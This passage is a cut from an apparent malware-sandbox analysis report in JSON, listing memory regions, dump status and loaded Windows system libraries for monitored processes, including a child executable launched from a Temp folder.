"timestamp": "00:00:54.592", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000786-addr_0x00000000003a0000-size_0x000000000000e000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_141", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 57344, "start_va": 3801088, "type": "region", "version": 1 }, "end_va": 3858431, "entry_point": 0, "filename": null, "id": "region_786", "name": "private_0x00000000003a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3801088, "timestamp": "00:00:54.628", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000787-addr_0x00000000003b0000-size_0x000000000000d000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_142", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 53248, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 3919871, "entry_point": 0, "filename": null, "id": "region_787", "name": "private_0x00000000003b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3866624, "timestamp": "00:00:54.632", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1979908096, "type": "region", "version": 1 }, "end_va": 1980563455, "entry_point": 1979992549, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_788", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1979908096, "timestamp": "00:00:54.634", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1980628992, "type": "region", "version": 1 }, "end_va": 1980985343, "entry_point": 1980734374, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_789", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1980628992, "timestamp": "00:00:54.635", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 360448, "start_va": 1868562432, "type": "region", "version": 1 }, "end_va": 1868922879, "entry_point": 1868567476, "filename": "\\Windows\\System32\\winhttp.dll", "id": "region_790", "name": "winhttp.dll", "norm_filename": "c:\\windows\\system32\\winhttp.dll", "region_type": "memory_mapped_file", "start_va": 1868562432, "timestamp": "00:00:54.850", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 323584, "start_va": 1868234752, "type": "region", "version": 1 }, "end_va": 1868558335, "entry_point": 1868239954, "filename": "\\Windows\\System32\\webio.dll", "id": "region_791", "name": "webio.dll", "norm_filename": "c:\\windows\\system32\\webio.dll", "region_type": "memory_mapped_file", "start_va": 1868234752, "timestamp": "00:00:54.852", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1976434688, "type": "region", "version": 1 }, "end_va": 1977704447, "entry_point": 1976441653, "filename": "\\Windows\\System32\\urlmon.dll", "id": "region_792", "name": "urlmon.dll", "norm_filename": "c:\\windows\\system32\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1976434688, "timestamp": "00:00:54.855", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1998454784, "type": "region", "version": 1 }, "end_va": 1999458303, "entry_point": 1998461029, "filename": "\\Windows\\System32\\wininet.dll", "id": "region_793", "name": "wininet.dll", "norm_filename": "c:\\windows\\system32\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1998454784, "timestamp": "00:00:54.856", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1977810944, "type": "region", "version": 1 }, "end_va": 1979887615, "entry_point": 1977819865, "filename": "\\Windows\\System32\\iertutil.dll", "id": "region_794", "name": "iertutil.dll", "norm_filename": "c:\\windows\\system32\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1977810944, "timestamp": "00:00:54.857", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1970995200, "type": "region", "version": 1 }, "end_va": 1972162559, "entry_point": 1971000714, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_795", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1970995200, "timestamp": "00:00:54.858", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1970798592, "type": "region", "version": 1 }, "end_va": 1970847743, "entry_point": 1970807694, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_796", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1970798592, "timestamp": "00:00:54.859", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 1969487872, "type": "region", "version": 1 }, "end_va": 1969598463, "entry_point": 1969525689, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_798", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1969487872, "timestamp": "00:00:55.316", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 19726336, "type": "region", "version": 1 }, "end_va": 22671359, "entry_point": 19726336, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_799", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 19726336, "timestamp": "00:00:55.319", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000800-addr_0x00000000003c0000-size_0x000000000000d000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_143", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 53248, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 3985407, "entry_point": 0, "filename": null, "id": "region_800", "name": "private_0x00000000003c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3932160, "timestamp": "00:00:55.392", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\ATVEYD~1\\AppData\\Local\\Temp\\38763.exe\"", "filename": "c:\\users\\atveyd~1\\appdata\\local\\temp\\38763.exe", "id": "proc_4", "image_name": "38763.exe", "monitor_reason": "child_process", "monitored_id": 4, "origin_monitor_id": 3, "ref_parent_process": { "ref_id": "proc_3", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000004-region_00000801-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_144", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_801", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:57.341", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000802-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_145", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_802", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:57.341", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1261567, "entry_point": 0, "filename": null, "id": "region_803", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:00:57.341", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4284415, "entry_point": 4199312, "filename": "\\Users\\ATVEYD~1\\AppData\\Local\\Temp\\38763.exe", "id": "region_804", "name": "38763.exe", "norm_filename": "c:\\users\\atveyd~1\\appdata\\local\\temp\\38763.exe", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:00:57.341", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 2002518016, "type": "region", "version": 1 }, "end_va": 2003812351, "entry_point": 2002518016, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_805", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2002518016, "timestamp": "00:00:57.342", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2004877312, "type": "region", "version": 1 }, "end_va": 2004881407, "entry_point": 2004877312, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_806", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2004877312, "timestamp": "00:00:57.343", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_807", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:57.346", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000808-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_146", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_808", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:00:57.346", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000809-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_147", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_809", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:57.346", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_810", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:57.360", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1732607, "entry_point": 1310720, "filename": "\\Windows\\System32\\locale.nls", "id": "region_811", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1310720, "timestamp": "00:00:57.360", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000812-addr_0x0000000000200000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_148", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2162687, "entry_point": 0, "filename": null, "id": "region_812", "name": "private_0x0000000000200000", "norm_filename": null, "region_type": "private_memory", "start_va": 2097152, "timestamp": "00:00:57.361", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000813-addr_0x00000000002b0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_149", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 3866623, "entry_point": 0, "filename": null, "id": "region_813", "name": "private_0x00000000002b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2818048, "timestamp": "00:00:57.361", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 5144575, "entry_point": 0, "filename": null, "id": "region_814", "name": "pagefile_0x0000000000420000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4325376, "timestamp": "00:00:57.361", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 331776, "start_va": 1832910848, "type": "region", "version": 1 }, "end_va": 1833242623, "entry_point": 1833080972, "filename": "\\Windows\\System32\\winspool.drv", "id": "region_815", "name": "winspool.drv", "norm_filename": "c:\\windows\\system32\\winspool.drv", "region_type": "memory_mapped_file", "start_va": 1832910848, "timestamp": "00:00:57.361", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1972174848, "type": "region", "version": 1 }, "end_va": 1972477951, "entry_point": 1972207072, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_816", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1972174848, "timestamp": "00:00:57.362", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1973878784, "type": "region", "version": 1 }, "end_va": 1974521855, "entry_point": 1974091735, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_817", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1973878784, "timestamp": "00:00:57.363", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1974534144, "type": "region", "version": 1 }, "end_va": 1974575103, "entry_point": 1974539116, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_818", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1974534144, "timestamp": "00:00:57.363", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1974861824, "type": "region", "version": 1 }, "end_va": 1975521279, "entry_point": 1975067699, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_819", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1974861824, "timestamp": "00:00:57.364", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1975582720, "type": "region", "version": 1 }, "end_va": 1976406015, "entry_point": 1975703313, "filename": "\\Windows\\System32\\user32.dll", "id": "region_820", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1975582720, "timestamp": "00:00:57.364", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1983184896, "type": "region", "version": 1 }, "end_va": 1984053247, "entry_point": 1983495652, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_821", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1983184896, "timestamp": "00:00:57.365", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 2000355328, "type": "region", "version": 1 }, "end_va": 2001059839, "entry_point": 2000397426, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_822", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 2000355328, "timestamp": "00:00:57.366", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 2001076224, "type": "region", "version": 1 }, "end_va": 2002501631, "entry_point": 2001386045, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_823", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 2001076224, "timestamp": "00:00:57.366", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 2003894272, "type": "region", "version": 1 }, "end_va": 2004213759, "entry_point": 2003934217, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_824", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2003894272, "timestamp": "00:00:57.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 2004221952, "type": "region", "version": 1 }, "end_va": 2004807679, "entry_point": 2004238257, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_825", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 2004221952, "timestamp": "00:00:57.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_826", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:57.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 1997799424, "type": "region", "version": 1 }, "end_va": 1997926399, "entry_point": 1997804373, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_827", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1997799424, "timestamp": "00:00:57.372", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1999503360, "type": "region", "version": 1 }, "end_va": 2000338943, "entry_point": 1999509131, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_828", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1999503360, "timestamp": "00:00:57.373", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000829-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_150", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_829", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:00:57.379", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000830-addr_0x00000000001b0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_151", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1773567, "entry_point": 0, "filename": null, "id": "region_830", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:00:57.379", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000831-addr_0x0000000000250000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_152", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2490367, "entry_point": 0, "filename": null, "id": "region_831", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:00:57.380", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 5177344, "type": "region", "version": 1 }, "end_va": 6230015, "entry_point": 0, "filename": null, "id": "region_832", "name": "pagefile_0x00000000004f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5177344, "timestamp": "00:00:57.380", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 6291456, "type": "region", "version": 1 }, "end_va": 18874367, "entry_point": 0, "filename": null, "id": "region_833", "name": "pagefile_0x0000000000600000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6291456, "timestamp": "00:00:57.380", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1983053824, "type": "region", "version": 1 }, "end_va": 1983156223, "entry_point": 1983072629, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_834", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1983053824, "timestamp": "00:00:57.381", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000835-addr_0x0000000001200000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_153", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 18874368, "type": "region", "version": 1 }, "end_va": 19922943, "entry_point": 0, "filename": null, "id": "region_835", "name": "private_0x0000000001200000", "norm_filename": null, "region_type": "private_memory", "start_va": 18874368, "timestamp": "00:00:57.389", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000836-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_154", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147340288, "type": "region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_836", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:00:57.389", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000837-addr_0x00000000001c0000-size_0x000000000000e000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_155", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 57344, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 1892351, "entry_point": 0, "filename": null, "id": "region_837", "name": "private_0x00000000001c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1835008, "timestamp": "00:00:57.427", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000838-addr_0x00000000001d0000-size_0x000000000000d000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_156", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 53248, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1953791, "entry_point": 0, "filename": null, "id": "region_838", "name": "private_0x00000000001d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1900544, "timestamp": "00:00:57.429", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1979908096, "type": "region", "version": 1 }, "end_va": 1980563455, "entry_point": 1979992549, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_839", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1979908096, "timestamp": "00:00:57.431", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1980628992, "type": "region", "version": 1 }, "end_va": 1980985343, "entry_point": 1980734374, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_840", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1980628992, "timestamp": "00:00:57.432", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 360448, "start_va": 1868562432, "type": "region", "version": 1 }, "end_va": 1868922879, "entry_point": 1868567476, "filename": "\\Windows\\System32\\winhttp.dll", "id": "region_841", "name": "winhttp.dll", "norm_filename": "c:\\windows\\system32\\winhttp.dll", "region_type": "memory_mapped_file", "start_va": 1868562432, "timestamp": "00:00:57.628", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump 